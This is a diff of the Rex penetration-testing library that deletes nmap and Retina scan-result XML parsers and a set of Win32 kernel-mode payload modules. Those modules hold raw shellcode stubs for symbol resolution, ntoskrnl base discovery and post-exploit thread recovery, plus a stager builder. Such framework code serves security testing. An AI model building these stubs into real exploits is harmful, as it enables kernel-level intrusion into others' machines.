librex 0.0.19 → 0.0.20

data/lib/rex/parser/nmap_xml.rb

@@ -1,137 +0,0 @@
-
-require 'rexml/document'
-
-module Rex
-module Parser
-
-#
-# Stream parser for nmap -oX xml output
-#
-# Yields a hash representing each host found in the xml stream.  Each host
-# will look something like the following:
-#	{
-#		"status" => "up",
-#		"addrs"  => { "ipv4" => "192.168.0.1", "mac" => "00:0d:87:a1:df:72" },
-#		"ports"  => [
-#			{ "portid" => "22", "state" => "closed", ... },
-#			{ "portid" => "80", "state" => "open", ... },
-#			...
-#		]
-#	}
-#
-# Usage:
-#   parser = NmapXMLStreamParser.new { |host|
-#     # do stuff with the host
-#   }
-#   REXML::Document.parse_stream(File.new(nmap_xml), parser)
-# -- or --
-#   parser = NmapXMLStreamParser.new
-#   parser.on_found_host = Proc.new { |host|
-#     # do stuff with the host
-#   }
-#   REXML::Document.parse_stream(File.new(nmap_xml), parser)
-#
-# This parser does not maintain state as well as a tree parser, so malformed
-# xml will trip it up.  Nmap shouldn't ever output malformed xml, so it's not
-# a big deal.
-#
-class NmapXMLStreamParser
-
-	#
-	# Callback for processing each found host
-	#
-	attr_accessor :on_found_host
-
-	#
-	# Create a new stream parser for NMAP XML output
-	#
-	# If given a block, it will be stored in +on_found_host+, otherwise you
-	# need to set it explicitly, e.g.:
-	#   parser = NmapXMLStreamParser.new
-	#   parser.on_found_host = Proc.new { |host|
-	#     # do stuff with the host
-	#   }
-	#   REXML::Document.parse_stream(File.new(nmap_xml), parser)
-	#
-	def initialize(&block)
-		reset_state
-		on_found_host = block if block
-	end
-
-	def reset_state
-		@host = { "status" => nil, "addrs" => {}, "ports" => [] }
-	end
-
-	def tag_start(name, attributes)
-		case name
-		when "address"
-			@host["addrs"][attributes["addrtype"]] = attributes["addr"]
-			if (attributes["addrtype"] =~ /ipv[46]/)
-				@host["addr"] = attributes["addr"]
-			end
-		when "osclass"
-			@host["os_vendor"]   = attributes["vendor"]
-			@host["os_family"]   = attributes["osfamily"]
-			@host["os_version"]  = attributes["osgen"]
-			@host["os_accuracy"] = attributes["accuracy"]
-		when "osmatch"
-			if(attributes["accuracy"].to_i == 100)
-				@host["os_match"] = attributes["name"]
-			end
-		when "uptime"
-			@host["last_boot"]   = attributes["lastboot"]
-		when "hostname"
-			if(attributes["type"] == "PTR")
-				@host["reverse_dns"] = attributes["name"]
-			end
-		when "status"
-			# <status> refers to the liveness of the host; values are "up" or "down"
-			@host["status"] = attributes["state"]
-			@host["status_reason"] = attributes["reason"]
-		when "port"
-			@host["ports"].push(attributes)
-		when "state"
-			# <state> refers to the state of a port; values are "open", "closed", or "filtered"
-			@host["ports"].last["state"] = attributes["state"]
-		when "service"
-			# Store any service and script info with the associated port.  There shouldn't
-			# be any collisions on attribute names here, so just merge them.
-			@host["ports"].last.merge!(attributes)
-		when "script"
-			@host["ports"].last["scripts"] ||= {}
-			@host["ports"].last["scripts"][attributes["id"]] = attributes["output"]
-		when "trace"
-			@host["trace"] = {"port" => attributes["port"], "proto" => attributes["proto"], "hops" => [] }
-		when "hop"
-			if @host["trace"]
-				@host["trace"]["hops"].push(attributes)
-			end
-		end
-	end
-
-	def tag_end(name)
-		case name
-		when "host"
-			on_found_host.call(@host) if on_found_host
-			reset_state
-		end
-	end
-
-	# We don't need these methods, but they're necessary to keep REXML happy
-	def text(str) # :nodoc:
-	end
-	def xmldecl(version, encoding, standalone) # :nodoc:
-	end
-	def cdata # :nodoc:
-	end
-	def comment(str) # :nodoc:
-	end
-	def instruction(name, instruction) # :nodoc:
-	end
-	def attlist # :nodoc:
-	end
-end
-
-end
-end
-

data/lib/rex/parser/retina_xml.rb

@@ -1,109 +0,0 @@
-module Rex
-module Parser
-
-# XXX - Retina XML does not include ANY service/port information export
-class RetinaXMLStreamParser
-
-	attr_accessor :on_found_host
-
-	def initialize(on_found_host = nil)
-		reset_state
-		self.on_found_host = on_found_host if on_found_host
-	end
-
-	def reset_state
-		@state = :generic_state
-		@host  = { 'vulns' => [] }
-		reset_audit_state
-	end
-	
-	def reset_audit_state
-		@audit = { 'refs' => [] }
-	end
-
-	def tag_start(name, attributes)
-		@state = "in_#{name.downcase}".intern
-	end
-
-	def text(str)
-		case @state
-		when :in_ip
-			@host["address"] = str
-		when :in_dnsname
-			@host["hostname"] = str.split(/\s+/).first
-		when :in_netbiosname
-			@host["netbios"] = str
-		when :in_mac
-			@host["mac"] = str
-		when :in_os
-			@host["os"] = str
-		when :in_rthid
-			@audit['refs'].push(['RETINA', str])
-		when :in_cve
-			str.split(",").each do |cve|
-				cve = cve.to_s.strip
-				next if cve.empty?
-				pre,val = cve.split('-', 2)
-				next if not val
-				next if pre != "CVE"
-				@audit['refs'].push( ['CVE', val] )
-			end
-		when :in_name
-			@audit['name'] = str
-		when :in_description
-			@audit['description'] = str
-		when :in_risk
-			@audit['risk'] = str
-		when :in_cce
-			@audit['cce'] = str
-		when :in_date
-			@audit['data'] = str
-		end
-	end
-
-	def tag_end(name)
-		case name
-		when "host"
-			on_found_host.call(@host) if on_found_host
-			reset_state
-		when "audit"
-			@host['vulns'].push @audit
-			reset_audit_state
-		end
-	end
-
-	# We don't need these methods, but they're necessary to keep REXML happy
-	def xmldecl(version, encoding, standalone); end
-	def cdata; end
-	def comment(str); end
-	def instruction(name, instruction); end
-	def attlist; end
-end
-end
-end
-
-__END__
-<scanJob>
-	<hosts>
-		<host>
-			<ip>10.2.79.98</ip>
-			<netBIOSName>bsmith-10156B07C</netBIOSName>
-			<dnsName>bsmith-10156b07c.core.testcorp.com  random.testcorp.com</dnsName>
-			<mac>00:02:29:0E:38:2B</mac>
-			<os>Windows Server 2003 (X64), Service Pack 2</os>
-			<audit>
-				<rthID>7851</rthID>
-				<cve>CVE-2009-0089,CVE-2009-0550,CVE-2009-0086</cve>
-				<cce>N/A</cce>
-				<name>Microsoft Windows HTTP Services Multiple Vulnerabilities (960803)</name>
-				<description>Microsoft Windows HTTP Services contains multiple vulnerabilities when handling ..</description>
-				<date>09/15/2010</date>
-				<risk>Low</risk>
-				<pciLevel>5 (Urgent)</pciLevel>
-				<cvssScore>10 [AV:N/AC:L/Au:N/C:C/I:C/A:C]</cvssScore>
-				<fixInformation>....</fixInformation>
-			</audit>
-		</host>
-	</hosts>
-</scanJob>		
-

data/lib/rex/payloads.rb

@@ -1 +0,0 @@
-require 'rex/payloads/win32'

data/lib/rex/payloads/win32.rb

@@ -1,2 +0,0 @@
-require 'rex/payloads/win32/common'
-require 'rex/payloads/win32/kernel'

data/lib/rex/payloads/win32/common.rb

@@ -1,26 +0,0 @@
-module Rex
-module Payloads
-module Win32
-
-module Common
-
-	#
-	# Returns a stub that resolves the location of a symbol and then
-	# calls it.  Refer to the following link for more details:
-	#
-	# http://uninformed.org/index.cgi?v=3&a=4&p=10
-	#
-	def self.resolve_call_sym
-		"\x60\x31\xc9\x8b\x7d\x3c\x8b\x7c\x3d\x78\x01\xef\x8b" +
-		"\x57\x20\x01\xea\x8b\x34\x8a\x01\xee\x31\xc0\x99\xac" +
-		"\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x41\x66\x39\xda" +
-		"\x75\xe3\x49\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" +
-		"\x5f\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
-		"\x61\xff\xe0"
-	end
-
-end
-
-end
-end
-end

data/lib/rex/payloads/win32/kernel.rb

@@ -1,53 +0,0 @@
-module Rex
-module Payloads
-module Win32
-
-require 'rex/payloads/win32/kernel/common'
-require 'rex/payloads/win32/kernel/recovery'
-require 'rex/payloads/win32/kernel/stager'
-require 'rex/payloads/win32/kernel/migration'
-
-module Kernel
-
-	#
-	# Constructs a kernel-mode payload using the supplied options.  The options
-	# can be:
-	#
-	# Recovery      : The recovery method to use, such as 'spin'.
-	# Stager        : The stager method to use, such as 'sud_syscall_hook'.
-	# RecoveryStub  : The recovery stub that should be used, if any.
-	# UserModeStub  : The user-mode payload to execute, if any.
-	# KernelModeStub: The kernel-mode payload to execute, if any.
-	#
-	def self.construct(opts = {})
-		payload = nil
-
-		# Generate the recovery stub
-		if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
-			opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
-		end
-
-		# Append supplied recovery stub information in case there is some
-		# context specific recovery that must be done.
-		if opts['AppendRecoveryStub']
-			opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
-		end
-
-		# Generate the stager
-		if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
-			payload = Kernel::Stager.send(opts['Stager'], opts)
-		# Or, generate the migrator
-		elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
-			payload = Kernel::Migration.send(opts['Migrator'], opts)
-		else
-			raise ArgumentError, "A stager or a migrator must be specified."
-		end
-
-		payload
-	end
-
-end
-
-end
-end
-end

data/lib/rex/payloads/win32/kernel/common.rb

@@ -1,54 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-
-require 'rex/payloads/win32/common'
-
-#
-# This class provides common methods that may be shared across more than
-# one kernel-mode payload.  Many of these are from the following paper:
-#
-# http://www.uninformed.org/?v=3&a=4&t=sumry
-#
-module Common
-
-	#
-	# Returns a stub that will find the base address of ntoskrnl and
-	# place it in eax.  This method works by using an IDT entry.  Credit
-	# to eEye.
-	#
-	def self.find_nt_idt_eeye
-		"\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
-	end
-
-	#
-	# Returns a stub that will find the base address of ntoskrnl and 
-	# place it in eax.  This method uses a pointer found in KdVersionBlock.
-	#
-	def self.find_nt_kdversionblock
-		"\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
-	end
-
-	#
-	# Returns a stub that will find the base address of ntoskrnl and 
-	# place it in eax.  This method uses a pointer found in the
-	# processor control region as a starting point.
-	#
-	def self.find_nt_pcr
-		"\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
-	end
-
-	#
-	# Alias for resolving symbols.
-	#
-	def self.resolve_call_sym
-		Rex::Payloads::Win32::Common.resolve_call_sym
-	end
-
-end
-
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/migration.rb

@@ -1,12 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-
-module Migration
-end
-
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/recovery.rb

@@ -1,50 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-
-#
-# Recovery stubs are responsible for ensuring that the kernel does not crash.
-# They must 'recover' after the exploit has succeeded, either by consuming
-# the thread or continuing it on with its normal execution.  Recovery stubs
-# will often be exploit dependent.
-#
-module Recovery
-
-	#
-	# The default recovery method is to spin the thread
-	#
-	def self.default(opts = {})
-		spin(opts)
-	end
-
-	#
-	# Infinite 'hlt' loop.
-	#
-	def self.spin(opts = {})
-		"\xf4\xeb\xfd" 
-	end
-
-	#
-	# Restarts the idle thread by jumping back to the entry point of
-	# KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
-	# You can pass the 'KiIdleLoopAddress' in the options hash.
-	#
-	def self.idlethread_restart(opts = {})
-		# Default to fully patched XPSP2
-		opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
-
-		"\x31\xC0" +                                     # xor eax,eax
-		"\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
-		"\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
-		"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
-		"\x6A\x00" +                                     # push byte +0x0
-		"\xFF\xE0"                                       # jmp eax
-	end
-
-end
-
-end
-end
-end
-end